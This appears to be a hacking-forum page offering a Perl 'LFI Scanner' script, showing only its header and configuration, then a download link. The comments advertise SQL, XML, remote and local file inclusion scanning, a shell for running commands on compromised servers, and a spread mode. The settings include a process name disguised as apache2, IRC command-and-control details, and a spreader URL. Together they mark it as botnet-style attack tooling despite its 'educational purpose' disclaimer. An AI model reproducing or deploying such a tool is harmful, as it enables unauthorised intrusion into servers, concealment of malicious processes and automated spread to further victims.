BaMbY LFI Scanner

#!/usr/bin/perl
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";


Download [Full+id]
 
KiLL-9 CrEW Copyright © 2009 KiLL-9 CrEw Template Designed by Arianom Founder KilLL-9 CrEw Best Indonesian White Hacker. Allright Reserved.